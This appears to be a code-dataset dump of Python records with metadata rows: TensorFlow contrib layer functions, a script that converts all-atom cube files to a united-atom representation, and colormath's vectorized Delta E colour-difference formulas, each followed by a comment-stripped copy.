    df = ('channels_first' if data_format and data_format.startswith('NC')
          else 'channels_last')
    if num_outputs is not None:
      # Apply separable conv using the SeparableConvolution2D layer.
      layer = convolutional_layers.SeparableConvolution2D(
          filters=num_outputs,
          kernel_size=kernel_size,
          strides=stride,
          padding=padding,
          data_format=df,
          dilation_rate=utils.two_element_tuple(rate),
          activation=None,
          depth_multiplier=depth_multiplier,
          use_bias=not normalizer_fn and biases_initializer,
          depthwise_initializer=weights_initializer,
          pointwise_initializer=weights_initializer,
          bias_initializer=biases_initializer,
          depthwise_regularizer=weights_regularizer,
          pointwise_regularizer=weights_regularizer,
          bias_regularizer=biases_regularizer,
          activity_regularizer=None,
          trainable=trainable,
          name=sc.name,
          dtype=inputs.dtype.base_dtype,
          _scope=sc,
          _reuse=reuse)
      outputs = layer.apply(inputs)

      # Add variables to collections.
      _add_variable_to_collections(layer.depthwise_kernel,
                                   variables_collections, 'weights')
      _add_variable_to_collections(layer.pointwise_kernel,
                                   variables_collections, 'weights')
      # Fix: compare against None instead of relying on the truthiness of a
      # Variable object (consistent with fully_connected above).
      if layer.bias is not None:
        _add_variable_to_collections(layer.bias,
                                     variables_collections, 'biases')

      if normalizer_fn is not None:
        normalizer_params = normalizer_params or {}
        outputs = normalizer_fn(outputs, **normalizer_params)
    else:
      # Actually apply depthwise conv instead of separable conv.
      dtype = inputs.dtype.base_dtype
      kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
      stride_h, stride_w = utils.two_element_tuple(stride)
      num_filters_in = utils.channel_dimension(
          inputs.get_shape(), df, min_rank=4)
      weights_collections = utils.get_variable_collections(
          variables_collections, 'weights')

      depthwise_shape = [kernel_h, kernel_w,
                         num_filters_in, depth_multiplier]
      depthwise_weights = variables.model_variable(
          'depthwise_weights',
          shape=depthwise_shape,
          dtype=dtype,
          initializer=weights_initializer,
          regularizer=weights_regularizer,
          trainable=trainable,
          collections=weights_collections)
      strides = [1, stride_h, stride_w, 1]

      outputs = nn.depthwise_conv2d(inputs, depthwise_weights, strides, padding,
                                    rate=utils.two_element_tuple(rate),
                                    data_format=data_format)
      num_outputs = depth_multiplier * num_filters_in

      if normalizer_fn is not None:
        normalizer_params = normalizer_params or {}
        outputs = normalizer_fn(outputs, **normalizer_params)
      else:
        if biases_initializer is not None:
          biases_collections = utils.get_variable_collections(
              variables_collections, 'biases')
          biases = variables.model_variable('biases',
                                            shape=[num_outputs,],
                                            dtype=dtype,
                                            initializer=biases_initializer,
                                            regularizer=biases_regularizer,
                                            trainable=trainable,
                                            collections=biases_collections)
          outputs = nn.bias_add(outputs, biases, data_format=data_format)

    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def softmax(logits, scope=None):
  """Applies softmax over the last dimension of an N-D tensor."""
  # TODO(jrru): Add axis argument which defaults to last dimension.
  with variable_scope.variable_scope(scope, 'softmax', [logits]):
    last_dim = utils.last_dimension(logits.get_shape(), min_rank=2)
    # Collapse to 2-D, apply softmax, restore the original shape.
    flat = array_ops.reshape(logits, [-1, last_dim])
    probs = nn.softmax(flat)
    probs = array_ops.reshape(probs, array_ops.shape(logits))
    probs.set_shape(logits.get_shape())
    return probs
@add_arg_scope
def spatial_softmax(features,
                    temperature=None,
                    name=None,
                    variables_collections=None,
                    trainable=True,
                    data_format='NHWC'):
  """Computes the spatial softmax of a 4-D feature map.

  For each channel, applies a softmax over the spatial locations and
  returns the softmax-weighted expected (x, y) coordinate, producing a
  tensor of shape `[batch, num_channels * 2]` with coordinates in [-1, 1].

  Raises:
    ValueError: If `data_format` is invalid or the channel dim is unknown.
  """
  shape = array_ops.shape(features)
  static_shape = features.shape
  if data_format == DATA_FORMAT_NHWC:
    height, width, num_channels = shape[1], shape[2], static_shape[3]
  elif data_format == DATA_FORMAT_NCHW:
    num_channels, height, width = static_shape[1], shape[2], shape[3]
  else:
    raise ValueError('data_format has to be either NCHW or NHWC.')
  if num_channels.value is None:
    raise ValueError('The num_channels dimension of the inputs to '
                     '`spatial_softmax` should be defined. Found `None`.')

  with ops.name_scope(name, 'spatial_softmax', [features]) as name:
    # Create tensors for x and y coordinate values, scaled to range [-1, 1].
    pos_x, pos_y = array_ops.meshgrid(math_ops.lin_space(-1., 1., num=height),
                                      math_ops.lin_space(-1., 1., num=width),
                                      indexing='ij')
    pos_x = array_ops.reshape(pos_x, [height * width])
    pos_y = array_ops.reshape(pos_y, [height * width])
    if temperature is None:
      # Default: a trainable scalar temperature initialized to 1.
      temperature_collections = utils.get_variable_collections(
          variables_collections, 'temperature')
      temperature = variables.model_variable(
          'temperature',
          shape=(),
          dtype=dtypes.float32,
          initializer=init_ops.ones_initializer(),
          collections=temperature_collections,
          trainable=trainable)
    # Flatten to [batch * channels, height * width] (NHWC is first moved to
    # channel-major order so each row is one channel's spatial map).
    if data_format == 'NCHW':
      features = array_ops.reshape(features, [-1, height * width])
    else:
      features = array_ops.reshape(
          array_ops.transpose(features, [0, 3, 1, 2]), [-1, height * width])
    softmax_attention = nn.softmax(features/temperature)
    # Expected coordinates under the per-channel spatial distribution.
    expected_x = math_ops.reduce_sum(
        pos_x * softmax_attention, [1], keep_dims=True)
    expected_y = math_ops.reduce_sum(
        pos_y * softmax_attention, [1], keep_dims=True)
    expected_xy = array_ops.concat([expected_x, expected_y], 1)
    feature_keypoints = array_ops.reshape(
        expected_xy, [-1, num_channels.value * 2])
    feature_keypoints.set_shape([None, num_channels.value * 2])
  return feature_keypoints
def stack(inputs, layer, stack_args, **kwargs):
  """Chains `layer` calls, feeding each call one entry of `stack_args`.

  Scalar entries of `stack_args` are wrapped in a single-element list
  before being passed as positional arguments.
  """
  scope = kwargs.pop('scope', None)
  if not isinstance(stack_args, (list, tuple)):
    raise ValueError('stack_args need to be a list or tuple')
  with variable_scope.variable_scope(scope, 'Stack', [inputs]):
    net = ops.convert_to_tensor(inputs)
    if scope is None:
      # Derive a scope name from the callable when none was given.
      if hasattr(layer, '__name__'):
        scope = layer.__name__
      elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
        scope = layer.func.__name__  # In case layer is a functools.partial.
      else:
        scope = 'stack'
    for idx, call_args in enumerate(stack_args):
      kwargs['scope'] = '%s_%d' % (scope, idx + 1)
      if not isinstance(call_args, (list, tuple)):
        call_args = [call_args]
      net = layer(net, *call_args, **kwargs)
    return net
@add_arg_scope
def unit_norm(inputs, dim, epsilon=1e-7, scope=None):
  """Normalizes `inputs` to unit L2 norm along dimension `dim`.

  `epsilon` is added under the square root for numerical stability.
  """
  with variable_scope.variable_scope(scope, 'UnitNorm', [inputs]):
    if not inputs.get_shape():
      raise ValueError('The input rank must be known.')
    rank = len(inputs.get_shape().as_list())
    if dim < 0 or dim >= rank:
      raise ValueError(
          'dim must be positive but smaller than the input rank.')

    norms = math_ops.sqrt(epsilon + math_ops.reduce_sum(
        math_ops.square(inputs), dim, True))
    # Build tile multiples: 1 everywhere except the normalized dimension,
    # which is restored to its dynamic size.
    tile_multiples = []
    if dim > 0:
      tile_multiples.append(array_ops.ones([dim], dtypes.int32))
    tile_multiples.append(
        array_ops.strided_slice(array_ops.shape(inputs), [dim], [dim + 1]))
    if dim < (rank - 1):
      tile_multiples.append(array_ops.ones([rank - 1 - dim], dtypes.int32))
    tile_multiples = array_ops.concat(tile_multiples, 0)
    return math_ops.div(inputs, array_ops.tile(norms, tile_multiples))
def poincare_normalize(x, axis=1, epsilon=1e-5, name=None):
  """Projects `x` so its norm along `axis` is at most `1 - epsilon`.

  Vectors already inside that ball are left unchanged (scale capped at 1).
  """
  with ops.name_scope(name, 'poincare_normalize', [x]) as name:
    x = ops.convert_to_tensor(x, name='x')
    norm_sq = math_ops.reduce_sum(math_ops.square(x), axis, keep_dims=True)
    scale = math_ops.minimum((1. - epsilon) * math_ops.rsqrt(norm_sq), 1.)
    return math_ops.multiply(x, scale, name=name)
def legacy_fully_connected(x,
                           num_output_units,
                           activation_fn=None,
                           weight_init=initializers.xavier_initializer(),
                           bias_init=init_ops.zeros_initializer(),
                           name=None,
                           weight_collections=(ops.GraphKeys.WEIGHTS,),
                           bias_collections=(ops.GraphKeys.BIASES,),
                           output_collections=(ops.GraphKeys.ACTIVATIONS,),
                           trainable=True,
                           weight_regularizer=None,
                           bias_regularizer=None):
  # pylint: disable=anomalous-backslash-in-string
  """Legacy fully connected layer (predecessor of `fully_connected`).

  Multiplies `x` by a `[last_dim(x), num_output_units]` weight matrix; for
  inputs of rank > 2 the leading dimensions are flattened first and the
  original leading shape is restored on the output. Adds a bias unless
  `bias_init` is None, then applies `activation_fn` via
  `_apply_activation`.

  Raises:
    ValueError: If the rank or the last dimension of `x` is unknown, or
      the rank is below 2.
  """
  with variable_scope.variable_scope(name, 'fully_connected', [x]):
    x = ops.convert_to_tensor(x)
    dims = x.get_shape().dims
    if dims is None:
      raise ValueError('dims of x must be known but is None')
    if len(dims) < 2:
      raise ValueError('rank of x must be at least 2 not: %d' % len(dims))
    num_input_units = dims[-1].value
    if num_input_units is None:
      raise ValueError('last dimension of x must be known but is None')
    dtype = x.dtype.base_dtype

    # Variables are always also tracked in GLOBAL_VARIABLES.
    weight_collections = set(list(weight_collections or []) +
                             [ops.GraphKeys.GLOBAL_VARIABLES])
    w = variable_scope.get_variable('weights',
                                    shape=[num_input_units, num_output_units],
                                    dtype=dtype,
                                    initializer=weight_init,
                                    collections=weight_collections,
                                    regularizer=weight_regularizer,
                                    trainable=trainable)
    # Collapse any leading dimensions so matmul sees a 2-D tensor.
    x_2_dim = x if len(dims) <= 2 else array_ops.reshape(x,
                                                         [-1, num_input_units])
    y = standard_ops.matmul(x_2_dim, w)

    if bias_init is not None:
      bias_collections = set(list(bias_collections or []) +
                             [ops.GraphKeys.GLOBAL_VARIABLES])
      b = variable_scope.get_variable('bias',
                                      shape=[num_output_units],
                                      dtype=dtype,
                                      initializer=bias_init,
                                      collections=bias_collections,
                                      regularizer=bias_regularizer,
                                      trainable=trainable)

      y = nn.bias_add(y, b)

    if len(dims) > 2:
      # Restore the original leading dimensions on the output.
      out_shape = array_ops.unstack(array_ops.shape(x))
      out_shape[-1] = num_output_units

      y = array_ops.reshape(y, array_ops.stack(out_shape))

      static_shape = x.get_shape().as_list()
      static_shape[-1] = num_output_units
      y.set_shape(static_shape)

    return _apply_activation(y, activation_fn, output_collections)
# TODO(eiderm): Verify and fix autocomplete in colab (also relu6).
# Simple aliases which remove the activation_fn parameter (the activation is
# baked into the partial instead).
elu = functools.partial(fully_connected, activation_fn=nn.elu)
legacy_relu = functools.partial(legacy_fully_connected, activation_fn=nn.relu)
legacy_linear = functools.partial(legacy_fully_connected, activation_fn=None)
relu = functools.partial(fully_connected, activation_fn=nn.relu)
relu6 = functools.partial(fully_connected, activation_fn=nn.relu6)
linear = functools.partial(fully_connected, activation_fn=None)

# Short-form aliases for the convolution functions above.
conv2d = convolution2d
conv3d = convolution3d
conv2d_transpose = convolution2d_transpose
conv3d_transpose = convolution3d_transpose
conv2d_in_plane = convolution2d_in_plane
separable_conv2d = separable_convolution2d
| true
| true
|
f704f90ac3c9d0634fcdcbb3eca1f502fa10cc71
| 3,596
|
py
|
Python
|
aa2ua_cube.py
|
jotelha/smampppp
|
729e4733b436e68adfe07bcaa39a47727d0c8dd8
|
[
"MIT"
] | 1
|
2022-03-15T17:23:52.000Z
|
2022-03-15T17:23:52.000Z
|
aa2ua_cube.py
|
jotelha/smampppp
|
729e4733b436e68adfe07bcaa39a47727d0c8dd8
|
[
"MIT"
] | null | null | null |
aa2ua_cube.py
|
jotelha/smampppp
|
729e4733b436e68adfe07bcaa39a47727d0c8dd8
|
[
"MIT"
] | 1
|
2018-04-06T11:29:44.000Z
|
2018-04-06T11:29:44.000Z
|
#!/usr/bin/env python
""" Maps point charges obtained by GPAW and HORTON on the original'
' GROMACS topology initially modified by insertHbyList.py """
## jlh 2018/04/02
import ast
import h5py
import ase.io
from ase.io.cube import read_cube_data
import parmed as pmd
from parmed import gromacs
from insertHbyList import insertHbyList
import argparse
def main():
    """CLI entry point: parse arguments and run the all-atom to
    united-atom cube conversion."""
    parser = argparse.ArgumentParser(
        description='Converts an all-atom cube file into united-atom'
        ' representation based on certain replacement rules')
    parser.add_argument('infile_pdb', nargs='?', metavar='infile.pdb',
                        default='system.pdb',
                        help="Original .pdb file, before insertion of implicit hydrogen.")
    parser.add_argument('infile_top', nargs='?', metavar='infile.top',
                        default='system.top', help="Original GROMACS .top file")
    parser.add_argument('infile_cube', nargs='?', metavar='infile.cube',
                        default='esp.cube',
                        help="ESP descrition (or other scalar field) in all-atom cube file.")
    parser.add_argument('outfile_cube', nargs='?', metavar='outfile.cube',
                        default='esp_fitted_system.top', help="Output truncated by atoms only"
                        "present in all-atoms description")
    parser.add_argument('-i', '--insertion-rules',
                        default="{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}",
                        help="A string representation of a python dictionary, describing how "
                        "many implicit hydrogens have been inserted at which atom. Example: "
                        "{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}")
    args = parser.parse_args()

    print('Using replacement rules "{}"...'.format(args.insertion_rules))
    # literal_eval only accepts Python literals, so the rules string cannot
    # execute arbitrary code.
    rules = ast.literal_eval(args.insertion_rules)

    aa2ua_cube(args.infile_pdb, args.infile_top, args.infile_cube,
               args.outfile_cube, implicitHbondingPartners=rules)
def aa2ua_cube(infile_pdb, infile_top, infile_cube,
               outfile_cube, implicitHbondingPartners=None):
    """Truncate an all-atom cube file down to the united-atom atom set.

    Reads the original (pre-hydrogen-insertion) structure and topology,
    re-runs the implicit-hydrogen insertion to determine how many atoms
    were added, and writes a cube file containing only the original atoms.

    Args:
        infile_pdb: original .pdb file, before implicit-H insertion.
        infile_top: original GROMACS .top topology file.
        infile_cube: all-atom cube file (e.g. an ESP scalar field).
        outfile_cube: output cube file, truncated to the original atoms.
        implicitHbondingPartners: dict mapping atom names to the number of
            implicit hydrogens inserted there; defaults to the standard
            CD/CA/CB replacement rules.
    """
    # Build the default per call rather than using a shared mutable default
    # argument (a single dict instance would otherwise persist across calls).
    if implicitHbondingPartners is None:
        implicitHbondingPartners = {'CD4': 1, 'CD3': 1, 'CA2': 2, 'CA3': 2,
                                    'CA4': 2, 'CB2': 2, 'CB3': 2}
    ase_struct = ase.io.read(infile_pdb)
    pmd_struct = pmd.load_file(infile_pdb)
    pmd_top = gromacs.GromacsTopologyFile(infile_top, parametrize=False)
    # throws some warnings on angle types, does not matter for bonding info
    pmd_top.strip(':SOL,CL')  # strip water and electrolyte from system
    pmd_top.box = pmd_struct.box  # Needed because .prmtop contains box info
    pmd_top.positions = pmd_struct.positions
    new_ase_struct, new_pmd_struct, names, residues = insertHbyList(
        ase_struct, pmd_top, implicitHbondingPartners, 1.0)
    surplus_atoms = len(new_ase_struct) - len(ase_struct)
    print("{} atoms are going to be truncated from file"
          "{}...".format(surplus_atoms, infile_cube))
    cube_data, cube_atoms = read_cube_data(infile_cube)
    # ATTENTION: this just truncates trailing atoms based on the total count
    # difference between the UA and AA representations — it assumes the
    # inserted hydrogens were appended at the end of the atom list.
    ase.io.write(outfile_cube, cube_atoms[0:len(ase_struct)], data=cube_data)
# Script entry point: run the CLI only when executed directly.
if __name__ == '__main__':
    main()
| 44.95
| 87
| 0.682147
|
ort h5py
import ase.io
from ase.io.cube import read_cube_data
import parmed as pmd
from parmed import gromacs
from insertHbyList import insertHbyList
import argparse
def main():
parser = argparse.ArgumentParser(\
description='Converts an all-atom cube file into united-atom'
' representation based on certain replacement rules')
parser.add_argument('infile_pdb', nargs='?', metavar='infile.pdb',
default='system.pdb',
help="Original .pdb file, before insertion of implicit hydrogen.")
parser.add_argument('infile_top', nargs='?', metavar='infile.top',
default='system.top', help="Original GROMACS .top file")
parser.add_argument('infile_cube', nargs='?', metavar='infile.cube',
default='esp.cube',
help="ESP descrition (or other scalar field) in all-atom cube file.")
parser.add_argument('outfile_cube', nargs='?', metavar='outfile.cube',
default='esp_fitted_system.top', help="Output truncated by atoms only"
"present in all-atoms description")
parser.add_argument('-i','--insertion-rules',
default="{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}",
help="A string representation of a python dictionary, describing how "
"many implicit hydrogens have been inserted at which atom. Example: "
"{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}")
args = parser.parse_args()
print('Using replacement rules "{}"...'.format(args.insertion_rules))
implicitHbondingPartners = ast.literal_eval(args.insertion_rules)
aa2ua_cube(args.infile_pdb, args.infile_top, args.infile_cube,
args.outfile_cube,implicitHbondingPartners=implicitHbondingPartners)
def aa2ua_cube(infile_pdb, infile_top, infile_cube,
outfile_cube,implicitHbondingPartners=
{'CD4':1,'CD3':1,'CA2':2,'CA3':2,'CA4':2,'CB2':2,'CB3':2}):
ase_struct=ase.io.read(infile_pdb)
pmd_struct = pmd.load_file(infile_pdb)
pmd_top = gromacs.GromacsTopologyFile(infile_top,parametrize=False)
pmd_top.strip(':SOL,CL')
pmd_top.box = pmd_struct.box
pmd_top.positions = pmd_struct.positions
new_ase_struct, new_pmd_struct, names, residues = insertHbyList(
ase_struct,pmd_top,implicitHbondingPartners,1.0)
surplus_atoms = len(new_ase_struct) - len(ase_struct)
print("{} atoms are going to be truncated from file"
"{}...".format(surplus_atoms,infile_cube))
cube_data, cube_atoms = read_cube_data(infile_cube)
ase.io.write(outfile_cube, cube_atoms[0:len(ase_struct)], data=cube_data)
if __name__ == '__main__':
main()
| true
| true
|
f704fa8cf0c91be4a9dab86662c520f3207e5d08
| 5,352
|
py
|
Python
|
venv/lib/python3.7/site-packages/colormath/color_diff_matrix.py
|
rchen2123/ryu
|
99400f8c421c1a84b4c7e80dd26224b36ee6d779
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.7/site-packages/colormath/color_diff_matrix.py
|
rchen2123/ryu
|
99400f8c421c1a84b4c7e80dd26224b36ee6d779
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.7/site-packages/colormath/color_diff_matrix.py
|
rchen2123/ryu
|
99400f8c421c1a84b4c7e80dd26224b36ee6d779
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains the formulas for comparing Lab values with matrices
and vectors. The benefit of using NumPy's matrix capabilities is speed. These
calls can be used to efficiently compare large volumes of Lab colors.
"""
import numpy
def delta_e_cie1976(lab_color_vector, lab_color_matrix):
    """Return the Delta E (CIE1976) between `lab_color_vector` and every
    row of `lab_color_matrix`.

    CIE1976 is the plain Euclidean distance in Lab space, so this reduces
    to a vectorized 2-norm over the row-wise differences.
    """
    diff = lab_color_vector - lab_color_matrix
    return numpy.sqrt((diff * diff).sum(axis=1))
# noinspection PyPep8Naming
def delta_e_cie1994(lab_color_vector, lab_color_matrix,
                    K_L=1, K_C=1, K_H=1, K_1=0.045, K_2=0.015):
    """Return the Delta E (CIE1994) between `lab_color_vector` and every
    row of `lab_color_matrix`.

    Weighting constants:
        K_1: 0.045 graphic arts / 0.048 textiles
        K_2: 0.015 graphic arts / 0.014 textiles
        K_L: 1 default / 2 textiles
    """
    # Chroma of the reference color (scalar) and of each candidate row.
    chroma_ref = numpy.sqrt(numpy.power(lab_color_vector[1:], 2).sum())
    chroma_all = numpy.sqrt(numpy.power(lab_color_matrix[:, 1:], 2).sum(axis=1))

    deltas = lab_color_vector - lab_color_matrix
    delta_lightness = deltas[:, 0].copy()
    delta_chroma = chroma_ref - chroma_all
    # Reuse the first column to hold delta-C so the [-1, 1, 1] weighted
    # square below evaluates to delta_a**2 + delta_b**2 - delta_C**2.
    deltas[:, 0] = delta_chroma
    hue_sq = (numpy.power(deltas, 2) * numpy.array([-1, 1, 1])).sum(axis=1)
    # Clip tiny negative rounding residue before the square root.
    delta_hue = numpy.sqrt(hue_sq.clip(min=0))

    # Column vector of combined K * S weights for L, C and H respectively
    # (S_L is identically 1 in the CIE1994 formula).
    weights = numpy.array([
        [K_L * 1],
        [K_C * (1 + K_1 * chroma_ref)],
        [K_H * (1 + K_2 * chroma_ref)],
    ])
    stacked = numpy.vstack([delta_lightness, delta_chroma, delta_hue])
    return numpy.sqrt(numpy.power(stacked / weights, 2).sum(axis=0))
# noinspection PyPep8Naming
def delta_e_cmc(lab_color_vector, lab_color_matrix, pl=2, pc=1):
    """
    Calculates the Delta E (CMC l:c) between `lab_color_vector` and all
    colors in `lab_color_matrix`.

    CMC values
      Acceptability: pl=2, pc=1
      Perceptability: pl=1, pc=1
    """
    L, a, b = lab_color_vector
    # Chroma of the reference color (scalar) and of each candidate row.
    C_1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
    C_2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
    delta_lab = lab_color_vector - lab_color_matrix
    delta_L = delta_lab[:, 0].copy()
    delta_C = C_1 - C_2
    # Overwrite the delta-L column with delta-C so the [-1, 1, 1] weighted
    # square below evaluates to delta_a**2 + delta_b**2 - delta_C**2.
    delta_lab[:, 0] = delta_C

    # Hue angle of the reference color, normalized to [0, 360).
    H_1 = numpy.degrees(numpy.arctan2(b, a))
    if H_1 < 0:
        H_1 += 360

    F = numpy.sqrt(numpy.power(C_1, 4) / (numpy.power(C_1, 4) + 1900.0))
    if 164 <= H_1 <= 345:
        T = 0.56 + abs(0.2 * numpy.cos(numpy.radians(H_1 + 168)))
    else:
        T = 0.36 + abs(0.4 * numpy.cos(numpy.radians(H_1 + 35)))

    # Lightness, chroma and hue weighting functions.
    if L < 16:
        S_L = 0.511
    else:
        S_L = (0.040975 * L) / (1 + 0.01765 * L)
    S_C = ((0.0638 * C_1) / (1 + 0.0131 * C_1)) + 0.638
    S_H = S_C * (F * T + 1 - F)

    delta_H_sq = numpy.sum(numpy.power(delta_lab, 2) * numpy.array([-1, 1, 1]), axis=1)
    # Clip tiny negative rounding residue before the square root.
    # noinspection PyArgumentList
    delta_H = numpy.sqrt(delta_H_sq.clip(min=0))

    LCH = numpy.vstack([delta_L, delta_C, delta_H])
    params = numpy.array([[pl * S_L], [pc * S_C], [S_H]])
    return numpy.sqrt(numpy.sum(numpy.power(LCH / params, 2), axis=0))
# noinspection PyPep8Naming
def delta_e_cie2000(lab_color_vector, lab_color_matrix, Kl=1, Kc=1, Kh=1):
    """
    Calculates the Delta E (CIE2000) of two colors.

    `lab_color_vector` is a single Lab color; `lab_color_matrix` holds one
    Lab color per row. Returns a vector of distances, one per row. Kl, Kc
    and Kh are the parametric weighting factors for lightness, chroma and
    hue respectively (all 1 by default).
    """
    L, a, b = lab_color_vector
    avg_Lp = (L + lab_color_matrix[:, 0]) / 2.0
    # Chroma of the reference color (scalar) and of each candidate row.
    C1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
    C2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
    avg_C1_C2 = (C1 + C2) / 2.0
    # G compensates the a* axis for low-chroma (near-neutral) colors.
    G = 0.5 * (1 - numpy.sqrt(numpy.power(avg_C1_C2, 7.0) / (numpy.power(avg_C1_C2, 7.0) + numpy.power(25.0, 7.0))))
    a1p = (1.0 + G) * a
    a2p = (1.0 + G) * lab_color_matrix[:, 1]
    C1p = numpy.sqrt(numpy.power(a1p, 2) + numpy.power(b, 2))
    C2p = numpy.sqrt(numpy.power(a2p, 2) + numpy.power(lab_color_matrix[:, 2], 2))
    avg_C1p_C2p = (C1p + C2p) / 2.0
    # Hue-prime angles, normalized into [0, 360) via a boolean-mask add.
    h1p = numpy.degrees(numpy.arctan2(b, a1p))
    h1p += (h1p < 0) * 360
    h2p = numpy.degrees(numpy.arctan2(lab_color_matrix[:, 2], a2p))
    h2p += (h2p < 0) * 360
    avg_Hp = (((numpy.fabs(h1p - h2p) > 180) * 360) + h1p + h2p) / 2.0
    # T modulates the hue weighting as a function of the mean hue angle.
    T = 1 - 0.17 * numpy.cos(numpy.radians(avg_Hp - 30)) + \
        0.24 * numpy.cos(numpy.radians(2 * avg_Hp)) + \
        0.32 * numpy.cos(numpy.radians(3 * avg_Hp + 6)) - \
        0.2 * numpy.cos(numpy.radians(4 * avg_Hp - 63))
    # Wrap the hue difference into (-180, 180].
    diff_h2p_h1p = h2p - h1p
    delta_hp = diff_h2p_h1p + (numpy.fabs(diff_h2p_h1p) > 180) * 360
    delta_hp -= (h2p > h1p) * 720
    delta_Lp = lab_color_matrix[:, 0] - L
    delta_Cp = C2p - C1p
    delta_Hp = 2 * numpy.sqrt(C2p * C1p) * numpy.sin(numpy.radians(delta_hp) / 2.0)
    # Lightness, chroma and hue weighting functions.
    S_L = 1 + ((0.015 * numpy.power(avg_Lp - 50, 2)) / numpy.sqrt(20 + numpy.power(avg_Lp - 50, 2.0)))
    S_C = 1 + 0.045 * avg_C1p_C2p
    S_H = 1 + 0.015 * avg_C1p_C2p * T
    # Rotation term correcting the blue region (hue around 275 degrees).
    delta_ro = 30 * numpy.exp(-(numpy.power(((avg_Hp - 275) / 25), 2.0)))
    R_C = numpy.sqrt((numpy.power(avg_C1p_C2p, 7.0)) / (numpy.power(avg_C1p_C2p, 7.0) + numpy.power(25.0, 7.0)))
    R_T = -2 * R_C * numpy.sin(2 * numpy.radians(delta_ro))
    return numpy.sqrt(
        numpy.power(delta_Lp / (S_L * Kl), 2) +
        numpy.power(delta_Cp / (S_C * Kc), 2) +
        numpy.power(delta_Hp / (S_H * Kh), 2) +
        R_T * (delta_Cp / (S_C * Kc)) * (delta_Hp / (S_H * Kh)))
| 31.668639
| 116
| 0.604634
|
import numpy
def delta_e_cie1976(lab_color_vector, lab_color_matrix):
return numpy.sqrt(
numpy.sum(numpy.power(lab_color_vector - lab_color_matrix, 2), axis=1))
def delta_e_cie1994(lab_color_vector, lab_color_matrix,
K_L=1, K_C=1, K_H=1, K_1=0.045, K_2=0.015):
C_1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C_2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
delta_lab = lab_color_vector - lab_color_matrix
delta_L = delta_lab[:, 0].copy()
delta_C = C_1 - C_2
delta_lab[:, 0] = delta_C
delta_H_sq = numpy.sum(numpy.power(delta_lab, 2) * numpy.array([-1, 1, 1]), axis=1)
delta_H = numpy.sqrt(delta_H_sq.clip(min=0))
S_L = 1
S_C = 1 + K_1 * C_1
S_H = 1 + K_2 * C_1
LCH = numpy.vstack([delta_L, delta_C, delta_H])
params = numpy.array([[K_L * S_L], [K_C * S_C], [K_H * S_H]])
return numpy.sqrt(numpy.sum(numpy.power(LCH / params, 2), axis=0))
def delta_e_cmc(lab_color_vector, lab_color_matrix, pl=2, pc=1):
L, a, b = lab_color_vector
C_1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C_2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
delta_lab = lab_color_vector - lab_color_matrix
delta_L = delta_lab[:, 0].copy()
delta_C = C_1 - C_2
delta_lab[:, 0] = delta_C
H_1 = numpy.degrees(numpy.arctan2(b, a))
if H_1 < 0:
H_1 += 360
F = numpy.sqrt(numpy.power(C_1, 4) / (numpy.power(C_1, 4) + 1900.0))
if 164 <= H_1 and H_1 <= 345:
T = 0.56 + abs(0.2 * numpy.cos(numpy.radians(H_1 + 168)))
else:
T = 0.36 + abs(0.4 * numpy.cos(numpy.radians(H_1 + 35)))
if L < 16:
S_L = 0.511
else:
S_L = (0.040975 * L) / (1 + 0.01765 * L)
S_C = ((0.0638 * C_1) / (1 + 0.0131 * C_1)) + 0.638
S_H = S_C * (F * T + 1 - F)
delta_C = C_1 - C_2
delta_H_sq = numpy.sum(numpy.power(delta_lab, 2) * numpy.array([-1, 1, 1]), axis=1)
delta_H = numpy.sqrt(delta_H_sq.clip(min=0))
LCH = numpy.vstack([delta_L, delta_C, delta_H])
params = numpy.array([[pl * S_L], [pc * S_C], [S_H]])
return numpy.sqrt(numpy.sum(numpy.power(LCH / params, 2), axis=0))
def delta_e_cie2000(lab_color_vector, lab_color_matrix, Kl=1, Kc=1, Kh=1):
L, a, b = lab_color_vector
avg_Lp = (L + lab_color_matrix[:, 0]) / 2.0
C1 = numpy.sqrt(numpy.sum(numpy.power(lab_color_vector[1:], 2)))
C2 = numpy.sqrt(numpy.sum(numpy.power(lab_color_matrix[:, 1:], 2), axis=1))
avg_C1_C2 = (C1 + C2) / 2.0
G = 0.5 * (1 - numpy.sqrt(numpy.power(avg_C1_C2, 7.0) / (numpy.power(avg_C1_C2, 7.0) + numpy.power(25.0, 7.0))))
a1p = (1.0 + G) * a
a2p = (1.0 + G) * lab_color_matrix[:, 1]
C1p = numpy.sqrt(numpy.power(a1p, 2) + numpy.power(b, 2))
C2p = numpy.sqrt(numpy.power(a2p, 2) + numpy.power(lab_color_matrix[:, 2], 2))
avg_C1p_C2p = (C1p + C2p) / 2.0
h1p = numpy.degrees(numpy.arctan2(b, a1p))
h1p += (h1p < 0) * 360
h2p = numpy.degrees(numpy.arctan2(lab_color_matrix[:, 2], a2p))
h2p += (h2p < 0) * 360
avg_Hp = (((numpy.fabs(h1p - h2p) > 180) * 360) + h1p + h2p) / 2.0
T = 1 - 0.17 * numpy.cos(numpy.radians(avg_Hp - 30)) + \
0.24 * numpy.cos(numpy.radians(2 * avg_Hp)) + \
0.32 * numpy.cos(numpy.radians(3 * avg_Hp + 6)) - \
0.2 * numpy.cos(numpy.radians(4 * avg_Hp - 63))
diff_h2p_h1p = h2p - h1p
